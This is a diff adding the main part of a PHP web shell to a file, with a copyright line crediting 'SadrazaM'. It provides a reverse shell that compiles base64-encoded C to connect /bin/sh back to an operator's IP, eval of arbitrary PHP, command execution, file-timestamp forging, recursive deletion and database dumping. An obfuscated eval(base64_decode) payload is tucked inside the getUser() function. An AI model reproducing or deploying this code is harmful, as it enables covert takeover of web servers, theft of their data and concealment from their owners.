+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end sql backup
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://www.alturks.com/phpspy/plugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>Instead &raquo;');
+	p('year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Copyright (C) 2000-2010 <a href="http://www.r57.biz" target="_blank">SadrazaM</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+|&#1087;- +&#1090;
+======================================================*/
+
+function m($msg) {
+	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $admin, $timestamp, $_SERVER;
+	$key = ($prefix ? $admin['cookiepre'] : '').$key;
+	$life = $life ? $life : $admin['cookielife'];
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
+}
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// ||-++&#1099;++
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="doing" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024);
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr);
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+
+// -||&#1094;|&#1118;-+-+-&#1074;
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//-&#1084;++- +|+&#1090;
+function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// +&#1077;|&#1031;+&#1082;-&#1093;+++ 
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// |&#1093;| HTML| -&#1099;
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// +&#1105;+&#1073;+&#1080;-|
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-';
+	$owner['write'] = ($mode & 00200) ? 'w' : '-';
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-';
+	$group['read'] = ($mode & 00040) ? 'r' : '-';
+	$group['write'] = ($mode & 00020) ? 'w' : '-';
+	$group['execute'] = ($mode & 00010) ? 'x' : '-';
+	$world['read'] = ($mode & 00004) ? 'r' : '-';
+	$world['write'] = ($mode & 00002) ? 'w' : '-';
+	$world['execute'] = ($mode & 00001) ? 'x' : '-';
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';}}	return '';}$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
+// ++| -+-+
+function deltree($deldir) {
+	$mydir=@dir($deldir);
+	while($file=$mydir->read())	{
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file);
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	}
+	$mydir->close();
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// #&#1101;+&#1105;--+&#1092;|-#|+#+&#1083;|&#1094;++
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// +&#1105;+&#1073;|#|#|-+-+ -|-|-++|
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// +&#1105;+&#1073;|#|#-+-+|-+-+|-+-+
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// +&#1100;#&#1097;PHP+&#1092;+|#+- 
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// +&#1100;#&#1097;|&#1087;- |&#1097;+&#1038;
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+function GetList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=ue($dir);
+					$dirdata[$j]['server_link']=$f;
+					$dirdata[$j]['client_link']=ue($f);
+					$j++;
+				}
+				GetList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) {
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) {
+		return 0;
+	} else if(is_resource($res)) {
+		return 1;
+	} else {
+		return 2;
+	}
+	return 0;
+}
+
+function q($sql) {
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($size) {
+	if($size > 1073741824) {
+		$size = round($size / 1073741824 * 100) / 100 . ' G';
+	} elseif($size > 1048576) {
+		$size = round($size / 1048576 * 100) / 100 . ' M';
+	} elseif($size > 1024) {
+		$size = round($size / 1024 * 100) / 100 . ' K';
+	} else {
+		$size = $size . ' B';
+	}
+	return $size;
+}
+
+// -|-&#1111;|&#1028;# +&#1088;
+class PHPZip{
+	var $out='';
+	function PHPZip($dir)	{
+		if (@function_exists('gzcompress'))	{
+			$curdir = getcwd();
+			if (is_array($dir)) $filelist = $dir;
+			else{
+				$filelist=$this -> GetFileList($dir);//+-+ --#&#1101;
+				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+			}
+			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+			else chdir($curdir);
+			if (count($filelist)>0){
+				foreach($filelist as $filename){
+					if (is_file($filename)){
+						$fd = fopen ($filename, 'r');
+						$content = @fread ($fd, filesize($filename));
+						fclose ($fd);
+						if (is_array($dir)) $filename = basename($filename);
+						$this -> addFile($content, $filename);
+					}
+				}
+				$this->out = $this -> file();
+				chdir($curdir);
+			}
+			return 1;
+		}
+		else return 0;
+	}
+
+	// +&#1105;||++|&#1080;-+-++-+ --#&#1101;
+	function GetFileList($dir){
+		static $a;
+		if (is_dir($dir)) {
+			if ($dh = opendir($dir)) {
+				while ($file = readdir($dh)) {
+					if($file!='.' && $file!='..'){
+						$f=$dir .'/'. $file;
+						if(is_dir($f)) $this->GetFileList($f);
+						$a[]=$f;
+					}
+				}
+				closedir($dh);
+			}
+		}
+		return $a;
+	}
+
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+
+	function unix2DosTime($unixtime = 0) {
+		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		if ($timearray['year'] < 1980) {
+			$timearray['year']    = 1980;
+			$timearray['mon']     = 1;
+			$timearray['mday']    = 1;
+			$timearray['hours']   = 0;
+			$timearray['minutes'] = 0;
+			$timearray['seconds'] = 0;
+		} // end if
+		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	}
+
+	function addFile($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+
+		$dtime = dechex($this->unix2DosTime($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+
+		$this -> ctrl_dir[] = $cdrec;
+	}
+
+	function file() {
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
+	}
+}
+
+// #++|- +|+&#1090;
+function sqldumptable($table, $fp=0) {
+	$tabledump = "DROP TABLE IF EXISTS $table;\n";
+	$tabledump .= "CREATE TABLE $table (\n";
+
+	$firstfield=1;
+
+	$fields = q("SHOW FIELDS FROM $table");
+	while ($field = mysql_fetch_array($fields)) {
+		if (!$firstfield) {
+			$tabledump .= ",\n";
+		} else {
+			$firstfield=0;
+		}
+		$tabledump .= "   $field[Field] $field[Type]";
+		if (!empty($field["Default"])) {
+			$tabledump .= " DEFAULT '$field[Default]'";
+		}
+		if ($field['Null'] != "YES") {
+			$tabledump .= " NOT NULL";
+		}
+		if ($field['Extra'] != "") {
+			$tabledump .= " $field[Extra]";
+		}
+	}
+	fr($fields);
+
+	$keys = q("SHOW KEYS FROM $table");
+	while ($key = mysql_fetch_array($keys)) {
+		$kname=$key['Key_name'];
+		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
+			$kname="UNIQUE|$kname";
+		}
+		if(!is_array($index[$kname])) {
+			$index[$kname] = array();
+		}
+		$index[$kname][] = $key['Column_name'];
+	}
+	fr($keys);
+
+	while(list($kname, $columns) = @each($index)) {
+		$tabledump .= ",\n";
+		$colnames=implode($columns,",");
+
+		if ($kname == "PRIMARY") {
+			$tabledump .= "   PRIMARY KEY ($colnames)";
+		} else {
+			if (substr($kname,0,6) == "UNIQUE") {
+				$kname=substr($kname,7);
+			}
+			$tabledump .= "   KEY $kname ($colnames)";
+		}
+	}
+
+	$tabledump .= "\n);\n\n";
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+
+	$rows = q("SELECT * FROM $table");
+	$numfields = mysql_num_fields($rows);
+	while ($row = mysql_fetch_array($rows)) {
+		$tabledump = "INSERT INTO $table VALUES(";
+
+		$fieldcounter=-1;
+		$firstfield=1;
+		while (++$fieldcounter<$numfields) {
+			if (!$firstfield) {
+				$tabledump.=", ";
+			} else {
+				$firstfield=0;
+			}
+
